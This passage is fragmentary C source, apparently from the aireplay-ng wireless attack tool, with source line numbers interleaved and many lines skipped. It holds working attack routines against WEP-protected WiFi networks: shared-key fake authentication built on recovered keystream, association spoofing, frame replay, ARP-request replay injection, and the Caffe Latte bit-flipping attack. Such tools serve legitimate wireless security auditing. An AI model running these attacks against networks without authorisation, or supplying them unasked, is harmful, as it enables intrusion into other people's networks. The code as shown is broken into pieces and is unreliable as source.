if(opt.prga != NULL)
1463
if (opt.f_retry > 0) {
1464
if (retry == opt.f_retry) {
1471
if(ska && keystreamlen == 0)
1473
opt.fast = 1; //don't ask for approval
1474
memcpy(opt.f_bssid, opt.r_bssid, 6); //make the filter bssid the same, that is used for auth'ing
1477
while(keystreamlen < 16)
1479
capture_ask_packet(&caplen, 1); //wait for data packet
1480
z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
1481
if ( ( h80211[0] & 0x80 ) == 0x80 ) /* QoS */
1484
memcpy(iv, h80211+z, 4); //copy IV+IDX
1485
i = known_clear(keystream, &keystreamlen, weight, h80211, caplen-z-4-4); //recover first bytes
1490
for(i=0;i<keystreamlen;i++)
1491
keystream[i] ^= h80211[i+z+4];
1496
keystreamlen = opt.prgalen-4;
1497
memcpy(iv, opt.prga, 4);
1498
memcpy(keystream, opt.prga+4, keystreamlen);
1505
/* attempt to authenticate */
1507
memcpy( h80211, AUTH_REQ, 30 );
1508
memcpy( h80211 + 4, opt.r_bssid, 6 );
1509
memcpy( h80211 + 10, opt.r_smac , 6 );
1510
memcpy( h80211 + 16, opt.r_bssid, 6 );
1515
PCT; printf( "Sending Authentication Request" );
1517
printf(" (Open System)");
1519
printf(" (Shared Key)");
1523
for( i = 0; i < x_send; i++ )
1525
if( send_packet( h80211, 30 ) < 0 )
1530
if( send_packet( ackbuf, 14 ) < 0 )
1534
if( send_packet( ackbuf, 14 ) < 0 )
1542
/* waiting for an authentication response */
1544
if( time( NULL ) - tt >= 2 )
1546
if(opt.npackets > 0)
1570
"\nAttack was unsuccessful. Possible reasons:\n\n"
1571
" * Perhaps MAC address filtering is enabled.\n"
1572
" * Check that the BSSID (-a option) is correct.\n"
1573
" * Try to change the number of packets (-o option).\n"
1574
" * The driver/card doesn't support injection.\n"
1575
" * This attack sometimes fails against some APs.\n"
1576
" * The card is not on the same channel as the AP.\n"
1577
" * You're too far from the AP. Get closer, or lower\n"
1578
" the transmit rate.\n\n" );
1594
/* attempt to authenticate using ska */
1596
memcpy( h80211, AUTH_REQ, 30 );
1597
memcpy( h80211 + 4, opt.r_bssid, 6 );
1598
memcpy( h80211 + 10, opt.r_smac , 6 );
1599
memcpy( h80211 + 16, opt.r_bssid, 6 );
1600
h80211[1] |= 0x40; //set wep bit, as this frame is encrypted
1601
memcpy(h80211+24, iv, 4);
1602
memcpy(h80211+28, challenge, challengelen);
1603
h80211[28] = 0x01; //its always ska in state==2
1604
h80211[30] = 0x03; //auth sequence number 3
1607
if(keystreamlen < challengelen+4 && notice == 0)
1610
if(opt.prga != NULL)
1612
PCT; printf( "Specified xor file (-y) is too short, you need at least %d keystreambytes.\n", challengelen+4);
1616
PCT; printf( "You should specify a xor file (-y) with at least %d keystreambytes\n", challengelen+4);
1618
PCT; printf( "Trying fragmented shared key fake auth.\n");
1620
PCT; printf( "Sending encrypted challenge." );
1623
gettimeofday(&tv2, NULL);
1625
for( i = 0; i < x_send; i++ )
1627
if(keystreamlen < challengelen+4)
1629
packets=(challengelen)/(keystreamlen-4);
1630
if( (challengelen)%(keystreamlen-4) != 0 )
1633
memcpy(h80211+24, challenge, challengelen);
1636
send_fragments(h80211, challengelen+24, iv, keystream, keystreamlen-4, 1);
1640
add_icv(h80211, challengelen+28, 28);
1641
xor_keystream(h80211+28, keystream, challengelen+4);
1642
send_packet(h80211, 24+4+challengelen+4);
1645
if( send_packet( ackbuf, 14 ) < 0 )
1649
if( send_packet( ackbuf, 14 ) < 0 )
1657
/* waiting for an authentication response (using ska) */
1659
if( time( NULL ) - tt >= 2 )
1661
if(opt.npackets > 0)
1685
"\nAttack was unsuccessful. Possible reasons:\n\n"
1686
" * Perhaps MAC address filtering is enabled.\n"
1687
" * Check that the BSSID (-a option) is correct.\n"
1688
" * Try to change the number of packets (-o option).\n"
1689
" * The driver/card doesn't support injection.\n"
1690
" * This attack sometimes fails against some APs.\n"
1691
" * The card is not on the same channel as the AP.\n"
1692
" * You're too far from the AP. Get closer, or lower\n"
1693
" the transmit rate.\n\n" );
1708
if(opt.npackets == -1) x_send *= 2;
1711
/* attempt to associate */
1713
memcpy( h80211, ASSOC_REQ, 28 );
1714
memcpy( h80211 + 4, opt.r_bssid, 6 );
1715
memcpy( h80211 + 10, opt.r_smac , 6 );
1716
memcpy( h80211 + 16, opt.r_bssid, 6 );
1718
n = strlen( opt.r_essid );
1719
if( n > 32 ) n = 32;
1724
memcpy( h80211 + 30, opt.r_essid, n );
1725
memcpy( h80211 + 30 + n, RATES, 16 );
1726
memcpy( h80211 + 24, capa, 2);
1728
PCT; printf( "Sending Association Request" );
1732
for( i = 0; i < x_send; i++ )
1734
if( send_packet( h80211, 46 + n ) < 0 )
1739
if( send_packet( ackbuf, 14 ) < 0 )
1743
if( send_packet( ackbuf, 14 ) < 0 )
1751
/* waiting for an association response */
1753
if( time( NULL ) - tt >= 5 )
1755
if( x_send < 256 && (opt.npackets == -1) )
1767
if( opt.a_delay == 0 )
1773
if( time( NULL ) - tt >= opt.a_delay )
1775
if(opt.npackets == -1) x_send = 4;
1781
if( time( NULL ) - tr >= opt.delay )
1785
PCT; printf( "Sending keep-alive packet" );
1789
memcpy( h80211, NULL_DATA, 24 );
1790
memcpy( h80211 + 4, opt.r_bssid, 6 );
1791
memcpy( h80211 + 10, opt.r_smac, 6 );
1792
memcpy( h80211 + 16, opt.r_bssid, 6 );
1794
if( opt.npackets > 0 ) kas = opt.npackets;
1797
for( i = 0; i < kas; i++ )
1798
if( send_packet( h80211, 24 ) < 0 )
1807
/* read one frame */
1810
FD_SET( dev.fd_in, &rfds );
1815
if( select( dev.fd_in + 1, &rfds, NULL, NULL, &tv ) < 0 )
1817
if( errno == EINTR ) continue;
1818
perror( "select failed" );
1822
if( ! FD_ISSET( dev.fd_in, &rfds ) )
1825
caplen = read_packet( h80211, sizeof( h80211 ), NULL );
1827
if( caplen < 0 ) return( 1 );
1828
if( caplen == 0 ) continue;
1830
if( caplen == 10 && h80211[0] == 0xD4)
1832
if( memcmp(h80211+4, opt.r_smac, 6) == 0 )
1843
gettimeofday(&tv3, NULL);
1845
//wait 100ms for acks
1846
if ( (((tv3.tv_sec*1000000 - tv2.tv_sec*1000000) + (tv3.tv_usec - tv2.tv_usec)) > (100*1000)) &&
1847
(gotack > 0) && (gotack < packets) && (state == 3) && (packets > 1) )
1849
PCT; printf("Not enough acks, repeating...\n");
1857
switch( h80211[1] & 3 )
1859
case 0: mi_b = 16; mi_s = 10; mi_d = 4; break;
1860
case 1: mi_b = 4; mi_s = 10; mi_d = 16; break;
1861
case 2: mi_b = 10; mi_s = 16; mi_d = 4; break;
1862
default: mi_b = 10; mi_d = 16; mi_s = 24; break;
1865
/* check if the dest. MAC is ours and source == AP */
1867
if( memcmp( h80211 + mi_d, opt.r_smac, 6 ) == 0 &&
1868
memcmp( h80211 + mi_b, opt.r_bssid, 6 ) == 0 &&
1869
memcmp( h80211 + mi_s, opt.r_bssid, 6 ) == 0 )
1871
/* check if we got an deauthentication packet */
1873
if( h80211[0] == 0xC0 ) //removed && state == 4
1876
PCT; printf( "Got a deauthentication packet! (Waiting %d seconds)\n", deauth_wait );
1877
if(opt.npackets == -1) x_send = 4;
1880
read_sleep( deauth_wait * 1000000 );
1885
/* check if we got an disassociation packet */
1887
if( h80211[0] == 0xA0 && state == 6 )
1890
PCT; printf( "Got a disassociation packet! (Waiting %d seconds)\n", deauth_wait );
1891
if(opt.npackets == -1) x_send = 4;
1894
read_sleep( deauth_wait );
1899
/* check if we got an authentication response */
1901
if( h80211[0] == 0xB0 && (state == 1 || state == 3) )
1905
if( (state==1 && h80211[26] != 0x02) || (state==3 && h80211[26] != 0x04) )
1916
printf( "Error: packet length < 30 bytes\n" );
1917
read_sleep( 3*1000000 );
1922
if( (h80211[24] != 0 || h80211[25] != 0) && ska==0)
1925
printf("Switching to shared key authentication\n");
1926
read_sleep(2*1000000); //read sleep 2s
1931
n = h80211[28] + ( h80211[29] << 8 );
1938
printf( "AP rejects the source MAC address (%02X:%02X:%02X:%02X:%02X:%02X) ?\n",
1939
opt.r_smac[0], opt.r_smac[1], opt.r_smac[2],
1940
opt.r_smac[3], opt.r_smac[4], opt.r_smac[5] );
1944
printf( "AP rejects our capabilities\n" );
1950
if(h80211[26] == 0x02)
1951
printf("Switching to shared key authentication\n");
1952
if(h80211[26] == 0x04)
1954
printf("Challenge failure\n");
1957
read_sleep(2*1000000); //read sleep 2s
1964
printf( "Authentication failed (code %d)\n", n );
1965
if(opt.npackets == -1) x_send = 4;
1966
read_sleep( 3*1000000 );
1971
if(ska && h80211[26]==0x02 && challengelen == 0)
1973
memcpy(challenge, h80211+24, caplen-24);
1974
challengelen=caplen-24;
1978
if(h80211[26]==0x02)
1980
state = 2; /* grab challenge */
1981
printf( "Authentication 1/2 successful\n" );
1983
if(h80211[26]==0x04)
1986
printf( "Authentication 2/2 successful\n" );
1991
printf( "Authentication successful\n" );
1992
state = 4; /* auth. done */
1996
/* check if we got an association response */
1998
if( h80211[0] == 0x10 && state == 5 )
2005
printf( "Error: packet length < 30 bytes\n" );
2011
n = h80211[26] + ( h80211[27] << 8 );
2018
printf( "Denied (code 1), is WPA in use ?\n" );
2022
printf( "Denied (code 10), open (no WEP) ?\n" );
2026
printf( "Denied (code 12), wrong ESSID or WPA ?\n" );
2030
printf( "Association denied (code %d)\n", n );
2039
aid=( ( (h80211[29] << 8) || (h80211[28]) ) & 0x3FFF);
2040
printf( "Association successful :-) (AID: %d)\n", aid );
2047
state = 6; /* assoc. done */
2055
int do_attack_interactive( void )
2058
int mi_b, mi_s, mi_d;
2062
unsigned char bssid[6];
2063
unsigned char smac[6];
2064
unsigned char dmac[6];
2068
if( capture_ask_packet( &caplen, 0 ) != 0 )
2071
z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
2072
if ( ( h80211[0] & 0x80 ) == 0x80 ) /* QoS */
2075
/* rewrite the frame control & MAC addresses */
2077
switch( h80211[1] & 3 )
2079
case 0: mi_b = 16; mi_s = 10; mi_d = 4; break;
2080
case 1: mi_b = 4; mi_s = 10; mi_d = 16; break;
2081
case 2: mi_b = 10; mi_s = 16; mi_d = 4; break;
2082
default: mi_b = 10; mi_d = 16; mi_s = 24; break;
2085
if( memcmp( opt.r_bssid, NULL_MAC, 6 ) == 0 )
2086
memcpy( bssid, h80211 + mi_b, 6 );
2088
memcpy( bssid, opt.r_bssid, 6 );
2090
if( memcmp( opt.r_smac , NULL_MAC, 6 ) == 0 )
2091
memcpy( smac, h80211 + mi_s, 6 );
2093
memcpy( smac, opt.r_smac, 6 );
2095
if( memcmp( opt.r_dmac , NULL_MAC, 6 ) == 0 )
2096
memcpy( dmac, h80211 + mi_d, 6 );
2098
memcpy( dmac, opt.r_dmac, 6 );
2100
if( opt.r_fctrl != -1 )
2102
h80211[0] = opt.r_fctrl >> 8;
2103
h80211[1] = opt.r_fctrl & 0xFF;
2105
switch( h80211[1] & 3 )
2107
case 0: mi_b = 16; mi_s = 10; mi_d = 4; break;
2108
case 1: mi_b = 4; mi_s = 10; mi_d = 16; break;
2109
case 2: mi_b = 10; mi_s = 16; mi_d = 4; break;
2110
default: mi_b = 10; mi_d = 16; mi_s = 24; break;
2114
memcpy( h80211 + mi_b, bssid, 6 );
2115
memcpy( h80211 + mi_s, smac , 6 );
2116
memcpy( h80211 + mi_d, dmac , 6 );
2118
/* loop resending the packet */
2120
/* Check if airodump-ng is running. If not, print that message */
2121
printf( "You should also start airodump-ng to capture replies.\n\n" );
2123
signal( SIGINT, sighandler );
2126
memset( ticks, 0, sizeof( ticks ) );
2135
/* wait for the next timer interrupt, or sleep */
2137
if( dev.fd_rtc >= 0 )
2139
if( read( dev.fd_rtc, &n, sizeof( n ) ) < 0 )
2141
perror( "read(/dev/rtc) failed" );
2151
/* we can't trust usleep, since it depends on the HZ */
2153
gettimeofday( &tv, NULL );
2154
usleep( 1000000/RTC_RESOLUTION );
2155
gettimeofday( &tv2, NULL );
2157
f = 1000000 * (float) ( tv2.tv_sec - tv.tv_sec )
2158
+ (float) ( tv2.tv_usec - tv.tv_usec );
2160
ticks[0] += f / ( 1000000/RTC_RESOLUTION );
2161
ticks[1] += f / ( 1000000/RTC_RESOLUTION );
2162
ticks[2] += f / ( 1000000/RTC_RESOLUTION );
2165
/* update the status line */
2167
if( ticks[1] > (RTC_RESOLUTION/10) )
2170
printf( "\rSent %ld packets...(%d pps)\33[K\r", nb_pkt_sent, (int)((double)nb_pkt_sent/((double)ticks[0]/(double)RTC_RESOLUTION)));
2174
if( ( ticks[2] * opt.r_nbpps ) / RTC_RESOLUTION < 1 )
2177
/* threshold reached */
2181
if( nb_pkt_sent == 0 )
2184
if( send_packet( h80211, caplen ) < 0 )
2187
if( ((double)ticks[0]/(double)RTC_RESOLUTION)*(double)opt.r_nbpps > (double)nb_pkt_sent )
2189
if( send_packet( h80211, caplen ) < 0 )
2197
int do_attack_arp_resend( void )
2200
int arp_off1, arp_off2;
2201
int i, n, caplen, nb_arp, z;
2202
long nb_pkt_read, nb_arp_tot, nb_ack_pkt;
2211
struct pcap_file_header pfh_out;
2212
struct pcap_pkthdr pkh;
2213
struct ARP_req * arp;
2215
if ( opt.ringbuffer )
2216
arp = (struct ARP_req*) malloc( opt.ringbuffer * sizeof( struct ARP_req ) );
2218
arp = (struct ARP_req*) malloc( sizeof( struct ARP_req ) );
2220
/* capture only WEP data to broadcast address */
2226
memset( opt.f_dmac, 0xFF, 6 );
2228
if( memcmp( opt.r_smac, NULL_MAC, 6 ) == 0 )
2230
printf( "Please specify a source MAC (-h).\n" );
2234
if(getnet(NULL, 1, 1) != 0)
2237
/* create and write the output pcap header */
2239
gettimeofday( &tv, NULL );
2241
pfh_out.magic = TCPDUMP_MAGIC;
2242
pfh_out.version_major = PCAP_VERSION_MAJOR;
2243
pfh_out.version_minor = PCAP_VERSION_MINOR;
2244
pfh_out.thiszone = 0;
2245
pfh_out.sigfigs = 0;
2246
pfh_out.snaplen = 65535;
2247
pfh_out.linktype = LINKTYPE_IEEE802_11;
2249
lt = localtime( (const time_t *) &tv.tv_sec );
2251
memset( strbuf, 0, sizeof( strbuf ) );
2252
snprintf( strbuf, sizeof( strbuf ) - 1,
2253
"replay_arp-%02d%02d-%02d%02d%02d.cap",
2254
lt->tm_mon + 1, lt->tm_mday,
2255
lt->tm_hour, lt->tm_min, lt->tm_sec );
2257
printf( "Saving ARP requests in %s\n", strbuf );
2259
if( ( f_cap_out = fopen( strbuf, "wb+" ) ) == NULL )
2261
perror( "fopen failed" );
2265
n = sizeof( struct pcap_file_header );
2267
if( fwrite( &pfh_out, n, 1, f_cap_out ) != 1 )
2269
perror( "fwrite failed\n" );
2273
fflush( f_cap_out );
2275
printf( "You should also start airodump-ng to capture replies.\n" );
2277
if(opt.port_in <= 0)
2279
/* avoid blocking on reading the socket */
2280
if( fcntl( dev.fd_in, F_SETFL, O_NONBLOCK ) < 0 )
2282
perror( "fcntl(O_NONBLOCK) failed" );
2287
memset( ticks, 0, sizeof( ticks ) );
2289
tc = time( NULL ) - 11;
2301
/* sleep until the next clock tick */
2303
if( dev.fd_rtc >= 0 )
2305
if( read( dev.fd_rtc, &n, sizeof( n ) ) < 0 )
2307
perror( "read(/dev/rtc) failed" );
2317
gettimeofday( &tv, NULL );
2318
usleep( 1000000/RTC_RESOLUTION );
2319
gettimeofday( &tv2, NULL );
2321
f = 1000000 * (float) ( tv2.tv_sec - tv.tv_sec )
2322
+ (float) ( tv2.tv_usec - tv.tv_usec );
2324
ticks[0] += f / ( 1000000/RTC_RESOLUTION );
2325
ticks[1] += f / ( 1000000/RTC_RESOLUTION );
2326
ticks[2] += f / ( 1000000/RTC_RESOLUTION );
2329
if( ticks[1] > (RTC_RESOLUTION/10) )
2332
printf( "\rRead %ld packets (got %ld ARP requests and %ld ACKs), "
2333
"sent %ld packets...(%d pps)\r",
2334
nb_pkt_read, nb_arp_tot, nb_ack_pkt, nb_pkt_sent, (int)((double)nb_pkt_sent/((double)ticks[0]/(double)RTC_RESOLUTION)) );
2338
if( ( ticks[2] * opt.r_nbpps ) / RTC_RESOLUTION >= 1 )
2340
/* threshold reach, send one frame */
2346
if( nb_pkt_sent == 0 )
2349
if( send_packet( arp[arp_off1].buf,
2350
arp[arp_off1].len ) < 0 )
2353
if( ((double)ticks[0]/(double)RTC_RESOLUTION)*(double)opt.r_nbpps > (double)nb_pkt_sent )
2355
if( send_packet( arp[arp_off1].buf,
2356
arp[arp_off1].len ) < 0 )
2360
if( ++arp_off1 >= nb_arp )
2365
/* read a frame, and check if it's an ARP request */
2367
if( opt.s_file == NULL )
2369
gettimeofday( &tv, NULL );
2371
caplen = read_packet( h80211, sizeof( h80211 ), NULL );
2373
if( caplen < 0 ) return( 1 );
2374
if( caplen == 0 ) continue;
2380
if( fread( &pkh, n, 1, dev.f_cap_in ) != 1 )
2386
if( dev.pfh_in.magic == TCPDUMP_CIGAM )
2387
SWAP32( pkh.caplen );
2389
tv.tv_sec = pkh.tv_sec;
2390
tv.tv_usec = pkh.tv_usec;
2392
n = caplen = pkh.caplen;
2394
if( n <= 0 || n > (int) sizeof( h80211 ) || n > (int) sizeof( tmpbuf ) )
2396
printf( "\r\33[KInvalid packet length %d.\n", n );
2401
if( fread( h80211, n, 1, dev.f_cap_in ) != 1 )
2407
if( dev.pfh_in.linktype == LINKTYPE_PRISM_HEADER )
2409
/* remove the prism header */
2411
if( h80211[7] == 0x40 )
2414
n = *(int *)( h80211 + 4 );
2416
if( n < 8 || n >= (int) caplen )
2419
memcpy( tmpbuf, h80211, caplen );
2421
memcpy( h80211, tmpbuf + n, caplen );
2424
if( dev.pfh_in.linktype == LINKTYPE_RADIOTAP_HDR )
2426
/* remove the radiotap header */
2428
n = *(unsigned short *)( h80211 + 2 );
2430
if( n <= 0 || n >= (int) caplen )
2433
memcpy( tmpbuf, h80211, caplen );
2435
memcpy( h80211, tmpbuf + n, caplen );
2438
if( dev.pfh_in.linktype == LINKTYPE_PPI_HDR )
2440
/* remove the PPI header */
2442
n = le16_to_cpu(*(unsigned short *)( h80211 + 2));
2444
if( n <= 0 || n>= (int) caplen )
2447
/* for a while Kismet logged broken PPI headers */
2448
if ( n == 24 && le16_to_cpu(*(unsigned short *)(h80211 + 8)) == 2 )
2451
if( n <= 0 || n>= (int) caplen )
2454
memcpy( tmpbuf, h80211, caplen );
2456
memcpy( h80211, tmpbuf + n, caplen );
2462
/* check if it's a disas. or deauth packet */
2464
if( ( h80211[0] == 0xC0 || h80211[0] == 0xA0 ) &&
2465
! memcmp( h80211 + 4, opt.r_smac, 6 ) )
2469
if( nb_bad_pkt > 64 && time( NULL ) - tc >= 10 )
2471
printf( "\33[KNotice: got a deauth/disassoc packet. Is the "
2472
"source MAC associated ?\n" );
2479
if( h80211[0] == 0xD4 &&
2480
! memcmp( h80211 + 4, opt.r_smac, 6 ) )
2485
/* check if it's a potential ARP request */
2487
opt.f_minlen = opt.f_maxlen = 68;
2489
if( filter_packet( h80211, caplen ) == 0 )
2492
opt.f_minlen = opt.f_maxlen = 86;
2494
if( filter_packet( h80211, caplen ) == 0 )
2497
z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
2498
if ( ( h80211[0] & 0x80 ) == 0x80 ) /* QoS */
2501
switch( h80211[1] & 3 )
2505
/* keep as a ToDS packet */
2507
memcpy( h80211 + 4, opt.f_bssid, 6 );
2508
memcpy( h80211 + 10, opt.r_smac, 6 );
2509
memcpy( h80211 + 16, opt.f_dmac, 6 );
2511
h80211[1] = 0x41; /* ToDS & WEP */
2513
case 2: /* FromDS */
2515
if( opt.r_fromdsinj )
2517
/* keep as a FromDS packet */
2519
memcpy( h80211 + 4, opt.f_dmac, 6 );
2520
memcpy( h80211 + 10, opt.f_bssid, 6 );
2521
memcpy( h80211 + 16, opt.r_smac, 6 );
2523
h80211[1] = 0x42; /* FromDS & WEP */
2527
/* rewrite header to make it a ToDS packet */
2529
memcpy( h80211 + 4, opt.f_bssid, 6 );
2530
memcpy( h80211 + 10, opt.r_smac, 6 );
2531
memcpy( h80211 + 16, opt.f_dmac, 6 );
2533
h80211[1] = 0x41; /* ToDS & WEP */
2538
//should be correct already, keep qos/wds status
2539
// h80211[0] = 0x08; /* normal data */
2541
/* if same IV, perhaps our own packet, skip it */
2543
for( i = 0; i < nb_arp; i++ )
2545
if( memcmp( h80211 + z, arp[i].buf + arp[i].hdrlen, 4 ) == 0 )
2554
/* add the ARP request in the ring buffer */
2558
/* Ring buffer size: by default: 8 ) */
2560
if( nb_arp >= opt.ringbuffer && opt.ringbuffer > 0)
2562
/* no more room, overwrite oldest entry */
2564
memcpy( arp[arp_off2].buf, h80211, caplen );
2565
arp[arp_off2].len = caplen;
2566
arp[arp_off2].hdrlen = z;
2568
if( ++arp_off2 >= nb_arp )
2572
if( ( arp[nb_arp].buf = malloc( 128 ) ) == NULL ) {
2573
perror( "malloc failed" );
2577
memcpy( arp[nb_arp].buf, h80211, caplen );
2578
arp[nb_arp].len = caplen;
2579
arp[nb_arp].hdrlen = z;
2582
pkh.tv_sec = tv.tv_sec;
2583
pkh.tv_usec = tv.tv_usec;
2584
pkh.caplen = caplen;
2589
if( fwrite( &pkh, n, 1, f_cap_out ) != 1 ) {
2590
perror( "fwrite failed" );
2596
if( fwrite( h80211, n, 1, f_cap_out ) != 1 ) {
2597
perror( "fwrite failed" );
2601
fflush( f_cap_out );
2609
int do_attack_caffe_latte( void )
2612
int arp_off1, arp_off2;
2613
int i, n, caplen, nb_arp, z;
2614
long nb_pkt_read, nb_arp_tot, nb_ack_pkt;
2624
struct pcap_file_header pfh_out;
2625
struct pcap_pkthdr pkh;
2626
struct ARP_req * arp;
2628
if ( opt.ringbuffer )
2629
arp = (struct ARP_req*) malloc( opt.ringbuffer * sizeof( struct ARP_req ) );
2631
arp = (struct ARP_req*) malloc( sizeof( struct ARP_req ) );
2633
/* capture only WEP data to broadcast address */
2640
if(getnet(NULL, 1, 1) != 0)
2643
if( memcmp( opt.f_bssid, NULL_MAC, 6 ) == 0 )
2645
printf( "Please specify a BSSID (-b).\n" );
2648
/* create and write the output pcap header */
2650
gettimeofday( &tv, NULL );
2652
pfh_out.magic = TCPDUMP_MAGIC;
2653
pfh_out.version_major = PCAP_VERSION_MAJOR;
2654
pfh_out.version_minor = PCAP_VERSION_MINOR;
2655
pfh_out.thiszone = 0;
2656
pfh_out.sigfigs = 0;
2657
pfh_out.snaplen = 65535;
2658
pfh_out.linktype = LINKTYPE_IEEE802_11;
2660
lt = localtime( (const time_t *) &tv.tv_sec );
2662
memset( strbuf, 0, sizeof( strbuf ) );
2663
snprintf( strbuf, sizeof( strbuf ) - 1,
2664
"replay_arp-%02d%02d-%02d%02d%02d.cap",
2665
lt->tm_mon + 1, lt->tm_mday,
2666
lt->tm_hour, lt->tm_min, lt->tm_sec );
2668
printf( "Saving ARP requests in %s\n", strbuf );
2670
if( ( f_cap_out = fopen( strbuf, "wb+" ) ) == NULL )
2672
perror( "fopen failed" );
2676
n = sizeof( struct pcap_file_header );
2678
if( fwrite( &pfh_out, n, 1, f_cap_out ) != 1 )
2680
perror( "fwrite failed\n" );
2684
fflush( f_cap_out );
2686
printf( "You should also start airodump-ng to capture replies.\n" );
2688
if(opt.port_in <= 0)
2690
/* avoid blocking on reading the socket */
2691
if( fcntl( dev.fd_in, F_SETFL, O_NONBLOCK ) < 0 )
2693
perror( "fcntl(O_NONBLOCK) failed" );
2698
memset( ticks, 0, sizeof( ticks ) );
2700
tc = time( NULL ) - 11;
2712
/* sleep until the next clock tick */
2714
if( dev.fd_rtc >= 0 )
2716
if( read( dev.fd_rtc, &n, sizeof( n ) ) < 0 )
2718
perror( "read(/dev/rtc) failed" );
2728
gettimeofday( &tv, NULL );
2729
usleep( 1000000/RTC_RESOLUTION );
2730
gettimeofday( &tv2, NULL );
2732
f = 1000000 * (float) ( tv2.tv_sec - tv.tv_sec )
2733
+ (float) ( tv2.tv_usec - tv.tv_usec );
2735
ticks[0] += f / ( 1000000/RTC_RESOLUTION );
2736
ticks[1] += f / ( 1000000/RTC_RESOLUTION );
2737
ticks[2] += f / ( 1000000/RTC_RESOLUTION );
2740
if( ticks[1] > (RTC_RESOLUTION/10) )
2743
printf( "\rRead %ld packets (%ld ARPs, %ld ACKs), "
2744
"sent %ld packets...(%d pps)\r",
2745
nb_pkt_read, nb_arp_tot, nb_ack_pkt, nb_pkt_sent, (int)((double)nb_pkt_sent/((double)ticks[0]/(double)RTC_RESOLUTION)) );
2749
if( ( ticks[2] * opt.r_nbpps ) / RTC_RESOLUTION >= 1 )
2751
/* threshold reach, send one frame */
2757
if( nb_pkt_sent == 0 )
2760
if( send_packet( arp[arp_off1].buf,
2761
arp[arp_off1].len ) < 0 )
2764
if( ((double)ticks[0]/(double)RTC_RESOLUTION)*(double)opt.r_nbpps > (double)nb_pkt_sent )
2766
if( send_packet( arp[arp_off1].buf,
2767
arp[arp_off1].len ) < 0 )
2771
if( ++arp_off1 >= nb_arp )
2776
/* read a frame, and check if it's an ARP request */
2778
if( opt.s_file == NULL )
2780
gettimeofday( &tv, NULL );
2782
caplen = read_packet( h80211, sizeof( h80211 ), NULL );
2784
if( caplen < 0 ) return( 1 );
2785
if( caplen == 0 ) continue;
2791
if( fread( &pkh, n, 1, dev.f_cap_in ) != 1 )
2797
if( dev.pfh_in.magic == TCPDUMP_CIGAM )
2798
SWAP32( pkh.caplen );
2800
tv.tv_sec = pkh.tv_sec;
2801
tv.tv_usec = pkh.tv_usec;
2803
n = caplen = pkh.caplen;
2805
if( n <= 0 || n > (int) sizeof( h80211 ) || n > (int) sizeof( tmpbuf ) )
2807
printf( "\r\33[KInvalid packet length %d.\n", n );
2812
if( fread( h80211, n, 1, dev.f_cap_in ) != 1 )
2818
if( dev.pfh_in.linktype == LINKTYPE_PRISM_HEADER )
2820
/* remove the prism header */
2822
if( h80211[7] == 0x40 )
2825
n = *(int *)( h80211 + 4 );
2827
if( n < 8 || n >= (int) caplen )
2830
memcpy( tmpbuf, h80211, caplen );
2832
memcpy( h80211, tmpbuf + n, caplen );
2835
if( dev.pfh_in.linktype == LINKTYPE_RADIOTAP_HDR )
2837
/* remove the radiotap header */
2839
n = *(unsigned short *)( h80211 + 2 );
2841
if( n <= 0 || n >= (int) caplen )
2844
memcpy( tmpbuf, h80211, caplen );
2846
memcpy( h80211, tmpbuf + n, caplen );
2849
if( dev.pfh_in.linktype == LINKTYPE_PPI_HDR )
2851
/* remove the PPI header */
2853
n = le16_to_cpu(*(unsigned short *)( h80211 + 2));
2855
if( n <= 0 || n>= (int) caplen )
2858
/* for a while Kismet logged broken PPI headers */
2859
if ( n == 24 && le16_to_cpu(*(unsigned short *)(h80211 + 8)) == 2 )
2862
if( n <= 0 || n>= (int) caplen )
2865
memcpy( tmpbuf, h80211, caplen );
2867
memcpy( h80211, tmpbuf + n, caplen );
2873
/* check if it's a disas. or deauth packet */
2875
if( ( h80211[0] == 0xC0 || h80211[0] == 0xA0 ) &&
2876
! memcmp( h80211 + 4, opt.r_smac, 6 ) )
2880
if( nb_bad_pkt > 64 && time( NULL ) - tc >= 10 )
2882
printf( "\33[KNotice: got a deauth/disassoc packet. Is the "
2883
"source MAC associated ?\n" );
2890
if( h80211[0] == 0xD4 &&
2891
! memcmp( h80211 + 4, opt.f_bssid, 6 ) )
2896
/* check if it's a potential ARP request */
2898
opt.f_minlen = opt.f_maxlen = 68;
2900
if( filter_packet( h80211, caplen ) == 0 )
2903
opt.f_minlen = opt.f_maxlen = 86;
2905
if( filter_packet( h80211, caplen ) == 0 )
2908
z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
2909
if ( ( h80211[0] & 0x80 ) == 0x80 ) /* QoS */
2912
switch( h80211[1] & 3 )
2914
case 0: /* ad-hoc */
2916
if(memcmp(h80211 + 16, BROADCAST, 6) == 0)
2918
/* rewrite to an ad-hoc packet */
2920
memcpy( h80211 + 4, BROADCAST, 6 );
2921
memcpy( h80211 + 10, opt.r_smac, 6 );
2922
memcpy( h80211 + 16, opt.f_bssid, 6 );
2924
h80211[1] = 0x40; /* WEP */
2936
if(memcmp(h80211 + 16, BROADCAST, 6) == 0)
2938
/* rewrite to a FromDS packet */
2940
memcpy( h80211 + 4, BROADCAST, 6 );
2941
memcpy( h80211 + 10, opt.f_bssid, 6 );
2942
memcpy( h80211 + 16, opt.f_bssid, 6 );
2944
h80211[1] = 0x42; /* ToDS & WEP */
2958
// h80211[0] = 0x08; /* normal data */
2960
/* if same IV, perhaps our own packet, skip it */
2962
for( i = 0; i < nb_arp; i++ )
2964
if( memcmp( h80211 + z, arp[i].buf + arp[i].hdrlen, 4 ) == 0 )
2973
/* add the ARP request in the ring buffer */
2977
/* Ring buffer size: by default: 8 ) */
2979
if( nb_arp >= opt.ringbuffer && opt.ringbuffer > 0)
2983
if( ( arp[nb_arp].buf = malloc( 128 ) ) == NULL ) {
2984
perror( "malloc failed" );
2988
memset(flip, 0, 4096);
2990
// flip[49-24-4] ^= ((rand() % 255)+1); //flip random bits in last byte of sender MAC
2991
// flip[53-24-4] ^= ((rand() % 255)+1); //flip random bits in last byte of sender IP
2992
flip[z+21] ^= ((rand() % 255)+1); //flip random bits in last byte of sender MAC
2993
flip[z+25] ^= ((rand() % 255)+1); //flip random bits in last byte of sender IP
2995
add_crc32_plain(flip, caplen-z-4-4);
2996
for(i=0; i<caplen-z-4; i++)
2997
(h80211+z+4)[i] ^= flip[i];
2999
memcpy( arp[nb_arp].buf, h80211, caplen );
3000
arp[nb_arp].len = caplen;
3001
arp[nb_arp].hdrlen = z;
3004
pkh.tv_sec = tv.tv_sec;
3005
